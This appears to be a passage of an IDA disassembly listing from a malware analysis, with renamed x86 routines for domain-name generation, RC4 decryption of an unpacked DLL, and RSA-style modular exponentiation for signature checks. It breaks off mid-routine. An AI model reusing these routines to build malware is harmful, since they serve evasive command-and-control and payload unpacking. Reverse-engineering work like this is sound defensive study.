; ---------------------------------------------------------------------------
loc_9AF0E3: ; DATA XREF: .text:stru_9A4978�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AF0E6: ; CODE XREF: sub_domain_names_generation+38�j
; sub_domain_names_generation+43�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_domain_names_generation endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_rc4_key_setup proc near ; CODE XREF: sub_rc4_decryption+16�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
mov [eax], edx
mov [eax+4], edx
xor ecx, ecx
loc_9AF0FF: ; CODE XREF: sub_rc4_key_setup+1A�j
mov [eax+ecx*4+8], ecx
inc ecx
cmp ecx, 100h
jl short loc_9AF0FF
push ebx
push esi
push edi
xor esi, esi
mov [ebp+arg_0], edx
loc_9AF114: ; CODE XREF: sub_rc4_key_setup+56�j
mov ecx, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov bl, [esi+ebx]
add bl, dl
lea edi, [eax+ecx*4+8]
mov ecx, [edi]
add bl, cl
movzx edx, bl
mov ebx, [eax+edx*4+8]
inc esi
cmp esi, [ebp+arg_8]
mov [edi], ebx
mov [eax+edx*4+8], ecx
jl short loc_9AF13C
xor esi, esi
loc_9AF13C: ; CODE XREF: sub_rc4_key_setup+48�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 100h
jl short loc_9AF114
pop edi
pop esi
pop ebx
pop ebp
retn
sub_rc4_key_setup endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_rc4_prng_routine proc near ; CODE XREF: sub_rc4_decryption+28�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ebx
mov ebx, [eax]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jle short loc_9AF199
push esi
loc_9AF162: ; CODE XREF: sub_rc4_prng_routine+49�j
inc bl
movzx ebx, bl
mov edx, [eax+ebx*4+8]
add cl, dl
movzx ecx, cl
lea esi, [eax+ecx*4+8]
mov [ebp+arg_0], ecx
mov ecx, [esi]
mov [eax+ebx*4+8], ecx
add cl, dl
mov [esi], edx
mov esi, [ebp+arg_4]
movzx ecx, cl
mov cl, [eax+ecx*4+8]
add esi, edi
xor [esi], cl
mov ecx, [ebp+arg_0]
inc edi
cmp edi, [ebp+arg_8]
jl short loc_9AF162
pop esi
loc_9AF199: ; CODE XREF: sub_rc4_prng_routine+12�j
pop edi
mov [eax], ebx
mov [eax+4], ecx
pop ebx
pop ebp
retn
sub_rc4_prng_routine endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_rc4_decryption proc near ; CODE XREF: sub_check_file_signature+98�p
; sub_rc4_part_of_unpakced_dll_file+4C�p ...
var_408 = byte ptr -408h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 408h
push [ebp+arg_C]
lea eax, [ebp+var_408]
push [ebp+arg_8]
push eax
call sub_rc4_key_setup
push [ebp+arg_4]
lea eax, [ebp+var_408]
push [ebp+arg_0]
push eax
call sub_rc4_prng_routine
add esp, 18h
leave
retn
sub_rc4_decryption endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_compare_0x80_dword_size proc near ; CODE XREF: sub_modulo_multiplication+3E�p
; sub_modulo_multiplication+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov ecx, 80h
loc_9AF1E5: ; CODE XREF: sub_compare_0x80_dword_size+1E�j
mov eax, [esi+ecx*4]
mov ebx, [edi+ecx*4]
cmp eax, ebx
jb short loc_9AF1F8
ja short loc_9AF1FF
dec ecx
jns short loc_9AF1E5
xor eax, eax
jmp short loc_9AF204
; ---------------------------------------------------------------------------
loc_9AF1F8: ; CODE XREF: sub_compare_0x80_dword_size+19�j
mov eax, 0FFFFFFFFh
jmp short loc_9AF204
; ---------------------------------------------------------------------------
loc_9AF1FF: ; CODE XREF: sub_compare_0x80_dword_size+1B�j
mov eax, 1
loc_9AF204: ; CODE XREF: sub_compare_0x80_dword_size+22�j
; sub_compare_0x80_dword_size+29�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_compare_0x80_dword_size endp
; =============== S U B R O U T I N E =======================================
sub_look_for_pos_of_1_from_low_bit_in_arg proc near ; CODE XREF: sub_modulo_multiplication+13�p
; sub_modulo_exponentiation+38�p
arg_0 = dword ptr 4
mov eax, 101Fh
push esi
loc_9AF20F: ; CODE XREF: sub_look_for_pos_of_1_from_low_bit_in_arg+1F�j
mov esi, [esp+4+arg_0]
mov edx, eax
shr edx, 5
mov edx, [esi+edx*4]
mov ecx, eax
and ecx, 1Fh
shr edx, cl
test dl, 1
jnz short loc_9AF22C
dec eax
jns short loc_9AF20F
xor eax, eax
loc_9AF22C: ; CODE XREF: sub_look_for_pos_of_1_from_low_bit_in_arg+1C�j
pop esi
retn
sub_look_for_pos_of_1_from_low_bit_in_arg endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_modulo_multiplication(void *Dst,int,int)
sub_modulo_multiplication proc near ; CODE XREF: sub_modulo_exponentiation+74�p
; sub_modulo_exponentiation+A1�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 204h ; Size
push 0 ; Val
push [ebp+Dst] ; Dst
call memset
push ebx
call sub_look_for_pos_of_1_from_low_bit_in_arg
mov edx, eax
add esp, 10h
test edx, edx
jl loc_9AF2EF
push esi
push edi
loc_9AF255: ; CODE XREF: sub_modulo_multiplication+B9�j
mov edi, [ebp+Dst]
xor eax, eax
mov ecx, 81h
loc_9AF25F: ; CODE XREF: sub_modulo_multiplication+36�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_9AF25F
push [ebp+arg_8]
push [ebp+Dst]
call sub_compare_0x80_dword_size
test eax, eax
pop ecx
pop ecx
jl short loc_9AF290
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9AF284: ; CODE XREF: sub_modulo_multiplication+60�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AF284
loc_9AF290: ; CODE XREF: sub_modulo_multiplication+47�j
mov eax, edx
shr eax, 5
mov eax, [ebx+eax*4]
mov ecx, edx
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9AF2E6
mov edi, [ebp+Dst]
mov esi, [ebp+arg_4]
mov ecx, 81h
xor eax, eax
loc_9AF2B0: ; CODE XREF: sub_modulo_multiplication+8C�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AF2B0
push [ebp+arg_8]
push [ebp+Dst]
call sub_compare_0x80_dword_size
test eax, eax
pop ecx
pop ecx
jl short loc_9AF2E6
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9AF2DA: ; CODE XREF: sub_modulo_multiplication+B6�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AF2DA
loc_9AF2E6: ; CODE XREF: sub_modulo_multiplication+73�j
; sub_modulo_multiplication+9D�j
dec edx
jns loc_9AF255
pop edi
pop esi
loc_9AF2EF: ; CODE XREF: sub_modulo_multiplication+1F�j
pop ebp
retn
sub_modulo_multiplication endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_modulo_exponentiation proc near ; CODE XREF: sub_verify_signature+89�p
var_410 = byte ptr -410h
Dst = byte ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 410h
push esi
push 200h ; Size
lea eax, [edi+4]
push 0 ; Val
push eax ; Dst
mov dword ptr [edi], 1
call memset
mov esi, 204h
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call memcpy
push [ebp+arg_4]
call sub_look_for_pos_of_1_from_low_bit_in_arg
and [ebp+var_4], 0
add esp, 1Ch
test eax, eax
mov [ebp+var_8], eax
jl short loc_9AF3B6
push ebx
loc_9AF33D: ; CODE XREF: sub_modulo_exponentiation+C2�j
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov eax, ecx
shr eax, 5
mov eax, [edx+eax*4]
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9AF37B
push [ebp+arg_8] ; int
lea eax, [ebp+var_410]
push edi ; int
push eax ; Dst
lea ebx, [ebp+Dst]
call sub_modulo_multiplication
push esi ; Size
lea eax, [ebp+var_410]
push eax ; Src
push edi ; Dst
call memcpy
add esp, 18h
loc_9AF37B: ; CODE XREF: sub_modulo_exponentiation+61�j
push [ebp+arg_8] ; int
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+var_4